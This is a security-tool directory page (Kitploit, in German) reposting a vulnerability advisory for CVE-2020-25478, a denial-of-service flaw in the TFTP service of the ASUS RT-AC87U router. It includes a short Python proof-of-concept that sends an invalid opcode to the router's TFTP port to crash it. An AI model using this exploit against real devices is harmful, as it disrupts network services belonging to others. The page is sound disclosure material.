Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2020-25478--ASUS-RT-AC87U-TFTP-is-vulnerable-to-Denial-of-Service-DoS-attack — ASUS RT-AC87U TFTP ist anfällig für Denial-of-Service-Angriffe (DoS). | Kitploit
Tools/GitHubGitHub/santokum/cve-2020-25478--asus-rt-ac87u-tftp-is-vulnerable-to-denial-of-service-dos-attack
SchwachstellenanalyseExploitationFuzzingHardware- & IoT-Sicherheit
GitHubsantokum/cve-2020-25478--asus-rt-ac87u-tftp-is-vulnerable-to-denial-of-service-dos-attack

CVE-2020-25478--ASUS-RT-AC87U-TFTP-is-vulnerable-to-Denial-of-Service-DoS-attack

ASUS RT-AC87U TFTP ist anfällig für Denial-of-Service-Angriffe (DoS).

Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
vor 3 JahrenNoch nicht geprüft

ASUS-RT-AC87U-TFTP-ist-anfällig-für-Denial-of-Service-DoS-Angriffe

CVE-2020-25478 - ASUS RT-AC87U TFTP ist anfällig für Denial-of-Service-Angriffe (DoS)

  1. NAME DER BETROFFENEN PRODUKTE UND VERSIONEN

ASUS RT-AC87U 3.0.0.4.382_51640

  1. PROBLEMTYP

Es steht in erster Linie im Zusammenhang mit CWE-20. Der auf dem ASUS RT-AC87U laufende TFTP-Dienst ist anfällig für Denial-of-Service-Angriffe (DoS), wenn ein ungültiger Opcode an den Dienst gesendet wird. Der folgende Python-Codeausschnitt wird zum Testen der Schwachstelle verwendet:

root@kitploit:~
	import socket
	import sys
	tftpd = ('192.168.1.1', 69)
	#Try and open an UDP SOCKET
	try:
	tftp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
	except:
	print("Failed on socket creation, so exiting")
	sys.exit(1)
	#create a invalid opcode exeeding the 2 byte length
	# opcode operation
	# 1 Read request (RRQ)
	# 2 Write request (WRQ)
	# 3 Data (DATA)
	# 4 Acknowledgment (ACK)
	# 5 Error (ERROR)
	invalidOpcode = "0000"
	tftp.sendto(invalidOpcode,tftpd)

3. BESCHREIBUNG

ASUS RT-AC87U in Version 3.0.0.4.382_51640 ist anfällig für Denial-of-Service-Angriffe auf den TFTP-Dienst, wodurch der TFTP-Dienst zum Absturz gebracht wird. Der TFTP-Dienst kann remote zum Absturz gebracht werden, indem ein ungültiger Opcode gesendet wird.

https://www.asus.com/content/ASUS-Product-Security-Advisory/

Tool herunterladen